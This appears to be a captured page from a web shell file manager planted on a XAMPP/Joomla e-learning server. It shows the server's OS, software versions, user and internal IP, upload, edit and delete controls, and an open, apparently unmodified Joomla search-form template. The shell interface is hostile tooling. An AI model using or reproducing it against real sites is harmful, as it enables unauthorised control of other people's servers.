[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_search
/
views
/
search
/
tmpl
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 default.php
911 B
SET
[ EDIT ]
|
[ DEL ]
📄 default.xml
2,638 B
SET
[ EDIT ]
|
[ DEL ]
📄 default_error.php
377 B
SET
[ EDIT ]
|
[ DEL ]
📄 default_form.php
3,124 B
SET
[ EDIT ]
|
[ DEL ]
📄 default_results.php
1,594 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: default_form.php
<?php /** * @package Joomla.Site * @subpackage com_search * * @copyright (C) 2006 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; JHtml::_('bootstrap.tooltip'); $lang = JFactory::getLanguage(); $upper_limit = $lang->getUpperLimitSearchWord(); ?> <form id="searchForm" action="<?php echo JRoute::_('index.php?option=com_search'); ?>" method="post"> <div class="btn-toolbar"> <div class="btn-group pull-left"> <label for="search-searchword" class="element-invisible"> <?php echo JText::_('COM_SEARCH_SEARCH_KEYWORD'); ?> </label> <input type="text" name="searchword" title="<?php echo JText::_('COM_SEARCH_SEARCH_KEYWORD'); ?>" placeholder="<?php echo JText::_('COM_SEARCH_SEARCH_KEYWORD'); ?>" id="search-searchword" size="30" maxlength="<?php echo $upper_limit; ?>" value="<?php echo $this->escape($this->origkeyword); ?>" class="inputbox" /> </div> <div class="btn-group pull-left"> <button name="Search" onclick="this.form.submit()" class="btn hasTooltip" title="<?php echo JHtml::_('tooltipText', 'COM_SEARCH_SEARCH');?>"> <span class="icon-search"></span> <?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?> </button> </div> <input type="hidden" name="task" value="search" /> <div class="clearfix"></div> </div> <div class="searchintro<?php echo $this->params->get('pageclass_sfx', ''); ?>"> <?php if (!empty($this->searchword)) : ?> <p> <?php echo JText::plural('COM_SEARCH_SEARCH_KEYWORD_N_RESULTS', '<span class="badge badge-info">' . $this->total . '</span>'); ?> </p> <?php endif; ?> </div> <?php if ($this->params->get('search_phrases', 1)) : ?> <fieldset class="phrases"> <legend> <?php echo JText::_('COM_SEARCH_FOR'); ?> </legend> <div class="phrases-box"> <?php echo $this->lists['searchphrase']; ?> </div> <div class="ordering-box"> <label for="ordering" class="ordering"> <?php echo JText::_('COM_SEARCH_ORDERING'); ?> </label> <?php echo $this->lists['ordering']; ?> </div> </fieldset> <?php endif; ?> <?php if ($this->params->get('search_areas', 1)) : ?> <fieldset class="only"> <legend> <?php echo JText::_('COM_SEARCH_SEARCH_ONLY'); ?> </legend> <?php foreach ($this->searchareas['search'] as $val => $txt) : ?> <?php $checked = is_array($this->searchareas['active']) && in_array($val, $this->searchareas['active']) ? 'checked="checked"' : ''; ?> <label for="area-<?php echo $val; ?>" class="checkbox"> <input type="checkbox" name="areas[]" value="<?php echo $val; ?>" id="area-<?php echo $val; ?>" <?php echo $checked; ?> /> <?php echo JText::_($txt); ?> </label> <?php endforeach; ?> </fieldset> <?php endif; ?> <?php if ($this->total > 0) : ?> <div class="form-limit"> <label for="limit"> <?php echo JText::_('JGLOBAL_DISPLAY_NUM'); ?> </label> <?php echo $this->pagination->getLimitBox(); ?> </div> <p class="counter"> <?php echo $this->pagination->getPagesCounter(); ?> </p> <?php endif; ?> </form>